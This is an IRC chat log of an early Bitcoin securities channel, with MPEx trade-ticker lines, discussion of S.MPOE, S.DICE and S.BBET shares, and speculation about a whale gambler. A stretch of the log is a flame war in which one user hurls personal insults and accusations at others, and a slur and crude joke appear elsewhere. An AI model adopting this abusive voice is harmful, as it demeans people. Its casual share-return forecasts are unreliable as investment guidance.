[BTCTC] [GSDPT] 2000 @ 0.0062 = 12.4 BTC [+] Feb 10 20:14:47 should electromobiles get more popular that wouldn't be a bad business idea, selling these kits Feb 10 20:15:00 harpoon + hooked wires Feb 10 20:15:11 you could have it detachable Feb 10 20:15:13 only use if need be Feb 10 20:15:15 "Recharge your auto errywhere" Feb 10 20:15:20 course difficult to charge for it Feb 10 20:15:48 no it won't be always attached Feb 10 20:15:50 a, actually : have the wires on poles with a special ring on them, and a connector Feb 10 20:15:59 the connector hooks to your car and only unhooks if you pay Feb 10 20:16:06 sort of like supermarket carts Feb 10 20:16:11 [BTCTC] [S.MPOE-PT] 100 @ 0.0007 = 0.07 BTC Feb 10 20:16:15 just when range anxiety kicks in, you go and hook to overhead electricity Feb 10 20:16:34 https://bitcointalk.org/index.php?topic=124441.msg1517002#msg1517002 lmao Feb 10 20:18:49 waiting for the first tard who tries to hook his tesla on 110kv Feb 10 20:19:17 i would hope they have some hard fuse Feb 10 20:19:44 110kv can jump over several meters... no fuse to help there Feb 10 20:19:58 this is true Feb 10 20:21:59 [MPEX] [S.MPOE] 8600 @ 0.00064305 = 5.5302 BTC [+] Feb 10 20:27:21 this is false Feb 10 20:27:22 http://www.kronjaeger.com/hv/hv/msr/spk/index.html Feb 10 20:27:39 110kV air gap crossing is a few inches tops. Feb 10 20:27:51 in dry conditions. Feb 10 20:33:13 [MPEX] [S.MPOE] 14200 @ 0.00064111 = 9.1038 BTC [-] Feb 10 20:35:32 [MPEX] [S.MPOE] 6300 @ 0.00064111 = 4.039 BTC [-] Feb 10 20:35:33 [MPEX] [S.MPOE] 10200 @ 0.00063324 = 6.459 BTC [-] Feb 10 20:36:04 [MPEX] [S.MPOE] 5131 @ 0.00062533 = 3.2086 BTC [-] Feb 10 20:36:13 [MPEX] [S.MPOE] 9310 @ 0.00062532 = 5.8217 BTC [-] Feb 10 20:37:36 people just be hatin' on S.MPOE lately Feb 10 20:37:42 wuzzupwiththat? Feb 10 20:39:26 peeps jumping on the sdice train? Feb 10 20:39:47 makes no sense Feb 10 20:40:01 I would think people would jump off the S.DICE train Feb 10 20:40:11 and rotate to S.MPOE Feb 10 20:40:34 they expect higher divs from s.dice Feb 10 20:42:06 and (needs analysis to confirm) s.mpoe has more early adopters that bought at lower prices than s.dice Feb 10 20:42:15 seems about even Feb 10 20:42:23 mpoe is like 11ish %, dice like 13 Feb 10 20:42:42 you mean PE? Feb 10 20:43:37 looks like SDICE share price is recovering quickly Feb 10 20:44:03 no i mean shares held by 3rd parties Feb 10 20:44:12 Bugpowder https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 i think teh lady doth have it. Feb 10 20:48:54 EskimoBob: lay off the gasoline Feb 10 20:50:02 i wonder how long he lasts before going the way of ciuciu Feb 10 20:50:18 cheebydi chippewa-adm coingenuity ColdHardMetal copumpkin Cory Feb 10 20:50:31 EskimoBob, i ask you again to do something genuinely useful Feb 10 20:50:47 yourself, i mean Feb 10 20:51:06 instead of telling others what they should be doing Feb 10 20:51:19 "Hitler reportedly told Goebbels in 1942 that he planned to convert Germany to vegetarianism after he had won the war." Feb 10 20:51:21 i mostly mind my own stuff.. let others decide if i;m useful Feb 10 20:51:25 is there a bad idea that guy didn't have ? Feb 10 20:51:27 he's like some angry drunk, raving at everybody and nobody Feb 10 20:52:29 eskimo, you avoided answer to my inquiry Feb 10 20:53:00 or you really think what you're doing right now is useful? Feb 10 20:53:26 EskimoBob: don't you own some s.dice shares? Feb 10 20:54:12 avoidance, again Feb 10 20:54:24 pro people sells their s.dice shares at 0.0075 Feb 10 20:55:31 I just think it's insane that someone would sow FUD about the very stock he holds Feb 10 20:55:38 Done, eskimobob on ignore, bleh Feb 10 20:55:44 no Feb 10 20:55:49 but -was- buying xD Feb 10 20:55:55 ( i sold at that price ) Feb 10 20:57:03 [MPEX] [S.MPOE] 1963 @ 0.00062532 = 1.2275 BTC [-] Feb 10 20:57:05 [MPEX] [S.MPOE] 7887 @ 0.00062519 = 4.9309 BTC [-] Feb 10 20:57:37 [MPEX] [S.MPOE] 2550 @ 0.00063142 = 1.6101 BTC [+] Feb 10 20:57:49 EskimoBob, i'm still waiting Feb 10 20:58:22 for some useful thing you did. or at least advice Feb 10 20:58:55 you like commandeering ppl over, don't you Feb 10 20:58:56 ? Feb 10 20:59:23 oh just read after yourself Feb 10 20:59:31 and i won't ignore you. i'm not so easy ;) Feb 10 21:00:43 literally, i did not ever seen a sentence written by you where you weren't telling someone else whet they should be doing Feb 10 21:01:06 except when you were talking bout clay mugs workshop, maybe Feb 10 21:01:38 I am less concerned about regulation with S.MPOE Feb 10 21:01:52 and I am deeply concerned with S.DICE's future revenue Feb 10 21:02:09 given the whale address analysis I posted. Feb 10 21:02:20 think it may be out of moneyz ? Feb 10 21:02:27 they are Feb 10 21:02:28 EskimoBob: URL please Feb 10 21:02:31 for now Feb 10 21:02:41 that's not to say more won't show up Feb 10 21:02:45 but i mean... are we satisfied there's pretty much 1 person playing the high stakes ? Feb 10 21:02:51 yah Feb 10 21:02:58 ah, i missed thaty Feb 10 21:03:00 i wonder who Feb 10 21:03:00 all those addresses passed coins around between them Feb 10 21:03:18 not a mixer/exchange/something tho ? Feb 10 21:03:44 https://bitcointalk.org/index.php?topic=80312.msg1516655#msg1516655 Feb 10 21:03:53 no direct refill from one address to another Feb 10 21:04:02 its all in the blockchain Feb 10 21:04:10 amazed that people don't do this homework Feb 10 21:04:23 it is possible EskimoBob Feb 10 21:04:31 and in fact, I first proposed this Feb 10 21:04:35 months ago. Feb 10 21:04:48 I don't believe it to be the case Feb 10 21:04:51 but it is possible Feb 10 21:05:06 I believe MP still has a 100BTC reward out there for proof Feb 10 21:05:26 yeah, still unclaimed. Feb 10 21:05:27 and Erik will pay 50BTC if you can come up with a way to DISPROVE it with his help Feb 10 21:05:52 pretty hefty sums huh Feb 10 21:06:22 EskimoBob: http://trilema.com/2013/the-question-of-the-year-in-btc/ Feb 10 21:06:40 up it and maybe the whale will reveal himself so he can use the winnings to bet more Feb 10 21:07:05 [BTCTC] [GOLD] 1 @ 0.7167 BTC [-] Feb 10 21:07:08 However, I am pretty sure the IPO withdrawl proceeds are still sitting in untouched addresses Feb 10 21:07:21 The thing is, whales really do exist… Erik recently returned from a trip to Macau, where he says he met with some gambling concerns… it seems reasonable to me that his visit sparked the interest of someone over there. Feb 10 21:08:06 maybe not though Feb 10 21:08:07 Bugpowder i haven't followed, but should be easy enough to see Feb 10 21:08:17 yeah, all we can do is speculate Feb 10 21:08:21 yeah, weren't there 10,000BTC withdrawals from 1Fx Feb 10 21:08:32 ;;ticker Feb 10 21:08:33 BTCUSD ticker | Best bid: 23.54300, Best ask: 23.57434, Bid-ask spread: 0.03134, Last trade: 23.54299, 24 hour volume: 53469.41322082, 24 hour low: 22.67000, 24 hour high: 23.98961, 24 hour vwap: 23.38975 Feb 10 21:08:36 sigh.... it's funny watching people talk about something that I know the definitive answer to, but have no way to prove it Feb 10 21:08:57 evoorhees you'll get used to it, i think this is one of the main effects of btc Feb 10 21:09:00 evoorhees: welcome to fearful investor time! Feb 10 21:09:01 creates this sort of problem Feb 10 21:09:18 of course, if whales really are chinese, they wouldn't be betting atm Feb 10 21:09:22 it's new year's right ? Feb 10 21:09:22 http://blockchain.info/address/1GvaYKp4z7V4wVzL3xC1Kvj7zrTwNAh2wM Feb 10 21:09:52 eskimobob - the whale/s is not me Feb 10 21:09:58 the conspiracy theories are inversely proportional to expected dividend yields :) Feb 10 21:10:39 maximian yes. but also directly proportional. Feb 10 21:10:40 I have yet to see a sentence from you in which you refrain from calling people names Feb 10 21:11:04 sure it could be trendon Feb 10 21:11:07 ha, yes Feb 10 21:11:12 ahahaha Feb 10 21:11:24 you could be trendon, eskimobob Feb 10 21:11:35 no, he couldn't. pirate was slimy but not stupid. Feb 10 21:11:45 http://blockchain.info/address/1AB2pgzv4yZQWp1ZS5Vb8sHWGHbuXwh2An Feb 10 21:11:52 http://blockchain.info/address/1BadjLJqb2CB73t3ZJ296xrwhHNhyo5JaU Feb 10 21:12:59 what's those ? Feb 10 21:13:28 I don't know eskimobob, but you really like to be rude and immature with people Feb 10 21:14:32 you're rude to me Feb 10 21:14:58 those are addresses with large withdrawls from MPEx, and where the money sits Feb 10 21:15:41 ah yes. Feb 10 21:15:56 not all of the large mpex withdrawals are erik, fwiw. Feb 10 21:16:28 yes you are eskimobob - in fact I think you're the only person in the entire bitcoin community who is consistently rude to me Feb 10 21:16:49 ? Feb 10 21:17:26 lol Feb 10 21:17:39 so for you to not be rude to someone constitutes special treatment? Feb 10 21:17:41 interesting Feb 10 21:18:30 [MPEX] [S.MPOE] 6038 @ 0.00062519 = 3.7749 BTC [-] Feb 10 21:18:32 [MPEX] [S.MPOE] 5612 @ 0.00062493 = 3.5071 BTC [-] Feb 10 21:20:39 EskimoBob, either you are rude to him or not... everyone can see which of that is the truth Feb 10 21:20:45 no spin ncessary Feb 10 21:20:52 [MPEX] [S.MPOE] 9250 @ 0.00063057 = 5.8328 BTC [+] Feb 10 21:20:53 [MPEX] [S.MPOE] 10400 @ 0.00063142 = 6.5668 BTC [+] Feb 10 21:21:39 oh yes, avoid the question again Feb 10 21:22:33 you can. but don't expect anyone to treat you seriously when you deny it Feb 10 21:22:41 ;;ticker Feb 10 21:22:42 BTCUSD ticker | Best bid: 23.62489, Best ask: 23.68998, Bid-ask spread: 0.06509, Last trade: 23.69000, 24 hour volume: 53432.08209497, 24 hour low: 22.67000, 24 hour high: 23.98961, 24 hour vwap: 23.39005 Feb 10 21:22:57 still plenty of potential upside... Feb 10 21:23:54 evoorhees: i am rude only to scumbags Feb 10 21:24:02 evoorhees:... and you are not a asshole, even you crawled to same bed with pervert popscu and the rest of the mpex clowns Feb 10 21:24:27 that denial is gaping Feb 10 21:24:42 [MPEX] [X.IDIFF.MAR] 70 @ 0.0429 = 3.003 BTC [-] Feb 10 21:25:01 lmao you basically said you won't be rude to him and then said he's in bed with perverts Feb 10 21:25:19 is there high school drama goin on Feb 10 21:25:27 ooh ooh! an eventful sunday for once Feb 10 21:25:45 i'm hust having eskimobob here on a couch for a while Feb 10 21:25:50 *just Feb 10 21:27:03 you have no esteem for erik's own judgement Feb 10 21:27:20 and you tell it to him in a rude way Feb 10 21:28:17 you see what you want to see, indeed Feb 10 21:28:52 EskimoBob is probably really nice in real life. It's a shame he acts like this online Feb 10 21:30:21 evoorhees prolly has a lot to do with all the people giving him attention this way Feb 10 21:30:33 as opposed to if he simply stuck to whatever he's doing, i don't recall. Feb 10 21:31:53 evoorhees: always so reasonable ;) Feb 10 21:35:38 no just eskimo's got a fit... and i sometimes like to get trolls bored Feb 10 21:36:18 ok so, the person doing farsi mpex faq wrote to express their concerns about use of terms such as "idiot". Feb 10 21:36:53 til i'm possibly the least polite person alive. Feb 10 21:38:04 you forget the girl Feb 10 21:40:14 see how impolite i am ? Feb 10 21:40:59 mircea_popescu: farsi translation? I guess they need to see your video of Qur'an burning Feb 10 21:41:23 actually first useful idea of his, can be included right in the faq Feb 10 21:42:05 from what i can tell iran is actualyl a merrily unstable mix of ethnic persians who resent the muslims and leading muslims who are struggling to stay in power. Feb 10 21:42:12 sorta like india/pakistan except reversed Feb 10 21:46:44 yes, he is not nice. but that's not a problem for me Feb 10 21:47:42 i'm curious why you are so mad Feb 10 21:47:50 so i'm making pointed inquiries Feb 10 21:48:20 what exactly he did it to you? did he sent a girl to call you idiot? puhleaze Feb 10 21:48:59 for someone who isn't mad you expend considerable energy Feb 10 21:49:50 including telling other people (that seem intelligent enough to have their own judgement) to not lay in bed with perverts Feb 10 21:50:32 ahahaha this is great. so you all think evoorhees is pretty nice ? somethingawful does not! Feb 10 21:50:35 "Honestly, from what I've seen of him, he's bad but he's no worse than Erik Voorhees, who posted above him. Erik says the stupidest true believer bullshit all the time. He spews Bruce-level garbage. My favorite is when, during the last crash, a distraught bitcoiner was whining about having to sell his bitcoins for less than he paid for them in order to not be living on the street. Erik told him that he didn't believe i Feb 10 21:50:35 n bitcoins hard enough and that he's glad that the guy sold his bitcoins because that means that there would be more available for Erik to purchase. He said something like, "This just shows that money always flows from the weak hands to the strong hands," and that his strong hands would be ready to snatch bitcoins from unfaithful bitcoiners. It's some of the stupidest poo poo I've ever heard." Feb 10 21:50:49 basically... he's not sensitive enough for the liberal club. what now ? Feb 10 21:50:58 [MPEX] [S.MPOE] 7338 @ 0.00062493 = 4.5857 BTC [-] Feb 10 21:50:59 [MPEX] [S.MPOE] 4900 @ 0.00062423 = 3.0587 BTC [-] Feb 10 21:51:02 [MPEX] [S.MPOE] 8612 @ 0.0006234 = 5.3687 BTC [-] Feb 10 21:51:26 hehehe I remember saying that Feb 10 21:51:30 and I was right Feb 10 21:51:35 BAM $23 Feb 10 21:51:39 lol Feb 10 21:52:00 its funny how them kids work, mentally. Feb 10 21:52:04 [MPEX] [S.MPOE] 1388 @ 0.0006234 = 0.8653 BTC [-] Feb 10 21:52:06 [MPEX] [S.MPOE] 8000 @ 0.00062196 = 4.9757 BTC [-] Feb 10 21:52:12 [MPEX] [S.MPOE] 5862 @ 0.00062161 = 3.6439 BTC [-] Feb 10 21:52:22 disregard all contrary evidence, subselect some idiots off bitcvoin forum, post endlessly about how those idiots disregard all contrary evidence Feb 10 21:52:32 it could be like a political debate or something. Feb 10 21:59:47 i'm not worried. just in mood to do some research why you do all the misguided effort Feb 10 22:00:50 [MPEX] [S.MPOE] 12467 @ 0.00062502 = 7.7921 BTC [+] Feb 10 22:00:57 [MPEX] [S.MPOE] 1033 @ 0.00062866 = 0.6494 BTC [+] Feb 10 22:01:00 and why something like mircea being pervert would have any bearing on business? Feb 10 22:01:40 me myself would be pronounced pervert in surprisingly large part of a world, cuz i'm gay Feb 10 22:02:07 EskimoBob just doesn't understand history, or facts really. Feb 10 22:02:31 spammer? i didn't seen any evidence. you mean that SEO misunderstanding? Feb 10 22:02:34 This hipster mentality, "we are young so we are owed the world". Feb 10 22:03:02 or that martha mcculler stuff that went nowhere? Feb 10 22:03:25 what stuff is that ? Feb 10 22:04:20 mircea_popescu: something wrt polimedia.us registration Feb 10 22:04:45 o i recall. some nitwit complained that i have no nexus, Feb 10 22:04:50 neustar inquired, i showed them teh nexus. Feb 10 22:04:55 great victory for interwebs day. Feb 10 22:05:35 [MPEX] [S.MPOE] 6488 @ 0.00062161 = 4.033 BTC [-] Feb 10 22:05:37 [MPEX] [S.MPOE] 2307 @ 0.00062044 = 1.4314 BTC [-] Feb 10 22:07:36 !ticker m S.MPOE Feb 10 22:07:38 [MPEX:S.MPOE] 1D: 0.00061978 / 0.00063368 / 0.00066091 (2909907 shares, 1,843.96 BTC), 7D: 0.00061978 / 0.00067944 / 0.0007 (20559168 shares, 13,968.81 BTC), 30D: 0.00059445 / 0.0006647 / 0.0007 (70380888 shares, 46,782.44 BTC) Feb 10 22:08:07 are investors pulling out because of the trolls/naysayers? Feb 10 22:08:15 o, i'm sure. Feb 10 22:08:17 of S.MPOE? Feb 10 22:08:23 XD Feb 10 22:08:23 who knows Feb 10 22:08:41 I know that I have picked up quite a bit Feb 10 22:08:50 i'd say most naysaying was around s.dice Feb 10 22:08:50 in the last 24 Feb 10 22:08:56 MPEX is awesome because unless you disclose yourself trading, no one really knows the investors. Feb 10 22:09:06 yup. Feb 10 22:09:17 I should probably stop disclosing :-P Feb 10 22:09:18 Some illuminati shit right there. Feb 10 22:09:23 you could be lieing. Feb 10 22:09:31 I am Feb 10 22:09:33 mircea_popescu: do keep access logs? Feb 10 22:09:34 I AM LIEING Feb 10 22:09:41 do you Feb 10 22:09:52 [MPEX] [S.MPOE] 13719 @ 0.00062866 = 8.6246 BTC [+] Feb 10 22:10:07 maximian which kind you mean ? all signed orders are kept yes. Feb 10 22:10:34 S.MPOE Feb 10 22:10:34 specifically, do your web servers retain IP addresses, browser agent strings, etc Feb 10 22:10:35 ? Feb 10 22:10:42 looks like its oversold Feb 10 22:11:01 no, just a likely 15% return within a week. Feb 10 22:11:11 ;;calc .0007/.00062 Feb 10 22:11:12 1.12903225806 Feb 10 22:11:16 13% Feb 10 22:11:22 maximian yeah, like normal apache does. the logs are purged periodically for space but the behaviour itself is not standardized. Feb 10 22:11:40 that is, if the .0007 does not sell through, which it probably will. Feb 10 22:11:44 the judgement is that privacy-minded users are better server by proxy/vpn/tor/etc Feb 10 22:11:49 right… I was just thinking it'd be a good idea to purge those regularly for anonymity Feb 10 22:12:02 it wouldn't help you anyway, the isp prolly keeps logs i can't purge Feb 10 22:12:06 true, but sometimes I get lazy :) Feb 10 22:12:10 if it's a concern you should use a proxy Feb 10 22:12:18 not a concern, just curious Feb 10 22:12:22 yeah. Feb 10 22:12:43 it just didn't seem something where benefits could be obtained, so i didn't bother to specify it any particular way. Feb 10 22:15:09 mircea_popescu: why do you artifically create demand for trade data, btw (historical data). Feb 10 22:15:21 i do ?! Feb 10 22:15:48 i'm sure anyone with the trade data could get more for it than it's truly worth due to you sealing executed trades from your end Feb 10 22:16:53 how much u pay Feb 10 22:16:58 ill start collecting :) Feb 10 22:17:13 ^- my point concisely :P Feb 10 22:17:20 the idea is that someone should start a service offering all that. Feb 10 22:17:32 mpex is about creating more or less the correct niching of the space Feb 10 22:18:37 i don't want to be a broker, or a data provider, or a whatever myself. rather than try and do everything i'd much rather see a lot of people each do something. Feb 10 22:18:49 certainly end up stronger that way (even if some fail along the way) Feb 10 22:19:20 certainly end up stronger that way (even if some fail along the way) Feb 10 22:19:21 [MPEX] [S.MPOE] 4143 @ 0.00062724 = 2.5987 BTC [-] Feb 10 22:19:23 [MPEX] [S.MPOE] 19257 @ 0.00062866 = 12.1061 BTC [+] Feb 10 22:19:27 oops Feb 10 22:19:53 With that logic the data provider would have to be someone from the beta, how can I also trust their data is valid without your signature? Feb 10 22:20:15 as soon as someone thinks the data is actually valuable, the service will exist Feb 10 22:20:24 before anyone thinks the data is valuable, the data is not valuable. Feb 10 22:20:51 [MPEX] [S.MPOE] 5800 @ 0.00062044 = 3.5986 BTC [-] Feb 10 22:22:52 that still doesn't answer the concern of validity Feb 10 22:22:56 [MPEX] [S.MPOE] 7003 @ 0.00062866 = 4.4025 BTC [+] Feb 10 22:22:58 [MPEX] [S.MPOE] 1083 @ 0.00063142 = 0.6838 BTC [+] Feb 10 22:22:59 [MPEX] [S.MPOE] 800 @ 0.00063272 = 0.5062 BTC [+] Feb 10 22:23:05 [MPEX] [S.MPOE] 12214 @ 0.00063409 = 7.7448 BTC [+] Feb 10 22:23:14 now that's a point. Feb 10 22:23:31 i guess it'd work like ripple, by consensus ? Feb 10 22:24:18 seems bulky to sign each rss item... Feb 10 22:24:20 certainly, but you are the only one who can _initially_ guarentee validity of the "first copy" Feb 10 22:24:30 guarantee* Feb 10 22:26:43 what's wrong with observers guaranteeing each other what they saw, this way checking me ? Feb 10 22:27:10 bah all that nonsense eskimoblob spam drowned out freemoney joining, and i wanted to talk to him Feb 10 22:27:17 see kids, this is why you don't feed the trolls. Feb 10 22:27:51 [MPEX] [S.DICE] 158 @ 0.00627403 = 0.9913 BTC [+] Feb 10 22:28:07 mircea_popescu: believer in relativity :P Feb 10 22:28:32 [MPEX] [S.MPOE] 1000 @ 0.00062045 = 0.6205 BTC [-] Feb 10 22:28:34 [MPEX] [S.MPOE] 5393 @ 0.00062044 = 3.346 BTC [-] Feb 10 22:28:39 just not centralising more than's needed. Feb 10 22:28:41 [MPEX] [S.MPOE] 10664 @ 0.00062002 = 6.6119 BTC [-] Feb 10 22:28:51 "The lightning struck at 2:00PM", says the man on the train "No it struck at 2:05" says the man standing still. Feb 10 22:30:32 "Technomadic Graphic Designer and Urban Artist accepting Bitcoins" Feb 10 22:30:39 is that what they call bums now, tehcnonomadic ? Feb 10 22:30:56 yes, bums with ipads Feb 10 22:31:50 mo ipads mo problems Feb 10 22:38:06 when do you think that jgarzik spent 1299 on an avalon ASIC instead of buying 1299 worth of coins? Feb 10 22:39:42 good q. Feb 10 22:39:51 seeing how no way that pos paid for itself by now. Feb 10 22:40:04 what he means is, it generated 1300 dollart's worth of coins at today's price or w/e Feb 10 22:40:28 well sure, but the audience soon forgets what else he could have done with that money Feb 10 22:41:18 indeed Feb 10 22:41:40 he'll probably end up ahead anyways, but just sayin Feb 10 22:41:47 prolly yeah. Feb 10 22:42:09 Network total 26.180 Thash/s still Feb 10 22:43:58 there was a bit of growth Feb 10 22:44:12 Namworld vairance tho Feb 10 22:48:50 [BTCTC] [S.MPOE-PT] 4 @ 0.0007 = 0.0028 BTC Feb 10 22:54:57 [MPEX] [S.MPOE] 11300 @ 0.00062434 = 7.055 BTC [+] Feb 10 22:54:59 [MPEX] [S.MPOE] 1611 @ 0.00062354 = 1.0045 BTC [-] Feb 10 23:01:39 yeah Feb 10 23:01:44 [MPEX] [S.DICE] 842 @ 0.00627403 = 5.2827 BTC [+] Feb 10 23:01:46 [MPEX] [S.DICE] 850 @ 0.00627404 = 5.3329 BTC [+] Feb 10 23:01:48 [MPEX] [S.DICE] 1000 @ 0.00639156 = 6.3916 BTC [+] Feb 10 23:01:54 [MPEX] [S.DICE] 500 @ 0.00639157 = 3.1958 BTC [+] Feb 10 23:01:56 [MPEX] [S.DICE] 500 @ 0.00639157 = 3.1958 BTC [+] Feb 10 23:02:03 [MPEX] [S.DICE] 1000 @ 0.00639158 = 6.3916 BTC [+] Feb 10 23:02:05 [MPEX] [S.DICE] 1000 @ 0.00639999 = 6.4 BTC [+] Feb 10 23:02:05 [MPEX] [S.DICE] 17808 @ 0.0064 = 113.9712 BTC [+] Feb 10 23:02:24 a rare s.dice movement is spotted! Feb 10 23:02:49 just following my prediction heh Feb 10 23:02:53 cool. Feb 10 23:04:01 only 44k left un 0.007 Feb 10 23:06:55 dont claim my whaleship :( Feb 10 23:07:04 was my btc yo Feb 10 23:08:21 oh snap Feb 10 23:08:23 there he is Feb 10 23:08:30 Now you can tell him to his face. Feb 10 23:08:47 >,> Feb 10 23:09:34 [MPEX] [S.MPOE] 11800 @ 0.00062378 = 7.3606 BTC [+] Feb 10 23:09:36 [MPEX] [S.MPOE] 928 @ 0.00063409 = 0.5884 BTC [+] Feb 10 23:10:36 [MPEX] [S.MPOE] 5377 @ 0.00062354 = 3.3528 BTC [-] Feb 10 23:10:37 [MPEX] [S.MPOE] 1000 @ 0.00062003 = 0.62 BTC [-] Feb 10 23:10:41 [MPEX] [S.MPOE] 7536 @ 0.00062002 = 4.6725 BTC [-] Feb 10 23:10:43 [MPEX] [S.MPOE] 1487 @ 0.00061951 = 0.9212 BTC [-] Feb 10 23:11:11 [MPEX] [S.MPOE] 14056 @ 0.00061951 = 8.7078 BTC [-] Feb 10 23:11:13 [MPEX] [S.MPOE] 7144 @ 0.0006192 = 4.4236 BTC [-] Feb 10 23:11:33 camo ? Feb 10 23:13:52 whaleship lmao Feb 10 23:14:10 i spent like 10 bux on dried prunes. these things are delicious i swear. Feb 10 23:14:25 doesnt sound like it. :P Feb 10 23:14:26 afk Feb 10 23:14:40 [MPEX] [S.MPOE] 6500 @ 0.00062079 = 4.0351 BTC [+] Feb 10 23:14:41 Anyone got S.BBET for sale? Feb 10 23:14:56 you forgot "for cheap" Feb 10 23:15:26 [BTCTC] [GSDPT] 3 @ 0.0064 = 0.0192 BTC [+] Feb 10 23:15:27 isn't 159900 a sale? Feb 10 23:15:28 No need for it to be cheap Feb 10 23:15:50 its an ask at least. go nuts :) Feb 10 23:15:50 nope... people were exiting as low as 30000 not long ago Feb 10 23:16:02 [MPEX] [S.MPOE] 74 @ 0.00062079 = 0.0459 BTC [+] Feb 10 23:16:03 [MPEX] [S.MPOE] 4990 @ 0.00063409 = 3.1641 BTC [+] Feb 10 23:16:05 [MPEX] [S.MPOE] 5402 @ 0.00063466 = 3.4284 BTC [+] Feb 10 23:16:09 159900 is ridiculously expensive Feb 10 23:16:20 lol then put up a bid for god sake Feb 10 23:16:51 s/god// Feb 10 23:16:52 I put bids for fuck sake Feb 10 23:17:03 Why can't I ask? Feb 10 23:17:42 ask all you like Feb 10 23:17:51 *shrug* Feb 10 23:18:28 just checking how much people want Feb 10 23:18:29 maybe someone can lend you (i can't, don't have any) Feb 10 23:18:38 ask smickles Feb 10 23:19:02 if you're so firmly convinced it's overpriced Feb 10 23:19:37 !ticker m s.bbet Feb 10 23:19:39 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0003 / 0.00091228 / 0.0015999 (20800 shares, 18.98 BTC), 30D: 0.0003 / 0.00144935 / 0.002 (369427 shares, 535.43 BTC) Feb 10 23:19:47 [BTCTC] [S.DICE-PT] 3 @ 0.0063 = 0.0189 BTC [+] Feb 10 23:19:52 [MPEX] [S.BBET] 318 @ 0.001599 = 0.5085 BTC [+] Feb 10 23:20:03 :] Feb 10 23:20:23 It is. Everyone was surprised it reached such high price Feb 10 23:21:23 its a pretty big gap between .0015 and .0005, so you could bid anything in between and just see if you can get them discounted that way. Feb 10 23:21:24 maybe....until whales discover it Feb 10 23:21:33 it's a humomgo gap srsly. Feb 10 23:21:48 looks almost like mmorpg store pricing Feb 10 23:21:54 "buy sword 1 gold, sell sword 8 gold" Feb 10 23:22:04 https://bitfunder.com/asset/G.BBET Feb 10 23:22:07 >,> Feb 10 23:22:10 Those fuckin merchants Feb 10 23:22:55 ;;calc 5000*0.001150 Feb 10 23:22:55 5.75 Feb 10 23:23:05 Looking at the statement for jan, it had like 206 accepted. that was pretty awesome for first mo. imho! Feb 10 23:24:39 [MPEX] [S.BBET] 182 @ 0.001599 = 0.291 BTC [+] Feb 10 23:25:16 Ukto / DeaDTerra, where did the ask vanish? Feb 10 23:25:31 almost snatched it Feb 10 23:25:49 wasn't bad for 1st month at all. Feb 10 23:26:10 march will have some good sporting ones for sure. Feb 10 23:26:11 ? Feb 10 23:26:15 there is an ask up Feb 10 23:26:37 college basketball etc.. Feb 10 23:26:43 yeah Feb 10 23:26:44 ukto, there was one for 0.001150 previously you scumbags Feb 10 23:26:52 0,o Feb 10 23:26:55 dont look at me Feb 10 23:27:07 i am not pulling the strings on that puppet Feb 10 23:27:08 :P Feb 10 23:27:27 lo Feb 10 23:27:29 l Feb 10 23:27:34 now it's 0.001950 . screw DeaDTerra. Feb 10 23:27:50 he really thinks someone will buy at such a price? Feb 10 23:28:05 hmm Feb 10 23:28:10 anything may happen on the passthroughs Feb 10 23:28:15 cant say I wouldnt try Feb 10 23:28:35 you! Feb 10 23:29:07 oh I also saw that some guy put a sharpie in his ass for like 10 BTC Feb 10 23:29:26 i just about died -- it was pretty gnarly. Feb 10 23:29:30 pfft. i'm withdrawing from bf and going elsewhere atm. Feb 10 23:29:42 gj terra Feb 10 23:29:43 i didn't expect balls when i opened the blog post for whatever reason lol Feb 10 23:29:56 :3 Feb 10 23:30:12 mod6 btc rules. Feb 10 23:30:19 haha, indeed sir. Feb 10 23:30:56 jurov moving to havelock ? Feb 10 23:31:03 lol Feb 10 23:31:18 DeaDTerra i'll send eskimobob for you! such manipulation! Feb 10 23:31:24 LOL Feb 10 23:31:31 dood, thats too much Feb 10 23:31:40 dont make horrid threats like that Feb 10 23:31:41 :P Feb 10 23:31:51 wait was it usagi who hired eskimo to threadcrap and didn't pay them or was it the other way around ? Feb 10 23:32:14 or no wait, they hired someone else ? Feb 10 23:32:51 PsychoticBoy: i got one, how much? Feb 10 23:32:52 :P Feb 10 23:33:06 i figure i can buy her back cheaper later Feb 10 23:33:11 >:P~ Feb 10 23:33:26 in fact i did more serious pricing typos myself when idiff launched... but 0.001150 seemed like completely reasonable lauch discount Feb 10 23:34:43 water under bridge. good luck deadTerra. Feb 10 23:36:02 link for the bbet result ? Feb 10 23:36:32 on BF? Feb 10 23:36:34 :P Feb 10 23:36:36 http://trilema.com/bitbet-january-2013-statement Feb 10 23:36:40 shh Feb 10 23:36:43 thank mp Feb 10 23:37:52 my pleasure Feb 10 23:37:56 cause i'm perverted like that. Feb 10 23:38:34 mircea_popescu at least you don't offer your mother for shorting (or you do?) Feb 10 23:38:53 my mother is tall, like me. Feb 10 23:38:58 --- Feb 10 23:39:00 -_- Feb 10 23:39:02 afk, bed Feb 10 23:39:05 i miss something ? or bbet made a wonderful 6 btc profit ? Feb 10 23:39:20 error4733 about there. Feb 10 23:39:43 [BTCTC] [RSM] 2 @ 0.0099 = 0.0198 BTC [+] Feb 10 23:39:48 BBET made a 6 BTC profit Feb 10 23:39:57 6.8 sry Feb 10 23:40:13 [MPEX] [S.DICE] 1050 @ 0.0064 = 6.72 BTC [+] Feb 10 23:40:17 so ffs why do you want buy some Feb 10 23:41:15 I want more at a reasonable price Feb 10 23:41:42 at current 50000 bid, would take 735 months with such monthly profits Feb 10 23:42:06 still better than BFL Feb 10 23:42:21 Still needs to be reduced by a factor 10 Feb 10 23:42:52 bbet needs someone creating interesting bets more often Feb 10 23:43:10 i dont think most people wanna create a bet Feb 10 23:43:15 so much as chime in on one Feb 10 23:43:37 when I surf it now, i'm like meh Feb 10 23:43:48 and a twitter feed on new bets maybe?! :D Feb 10 23:43:52 [MPEX] [S.MPOE] 5300 @ 0.00062313 = 3.3026 BTC [-] Feb 10 23:44:01 Namworld: your auction thread Feb 10 23:44:02 error4733 if you look through it, it took ~1600 btc in bets and the profits are only on the 400 closed in jan Feb 10 23:44:09 Namworld: post in it how much time is left to spook more bids Feb 10 23:44:14 in the ~week since then it took another 800 or so Feb 10 23:44:17 I told mircea, make it automated that sporting event gets bet Feb 10 23:44:22 so it has some potential of revenue Feb 10 23:44:33 Namworld i'd so much rather have people promote selected events themselves Feb 10 23:45:07 whats the most popular "real" betting site? Feb 10 23:45:56 etrade.com Feb 10 23:46:23 depend your country Feb 10 23:46:55 oh i thought it was bet.com, thx pigeons Feb 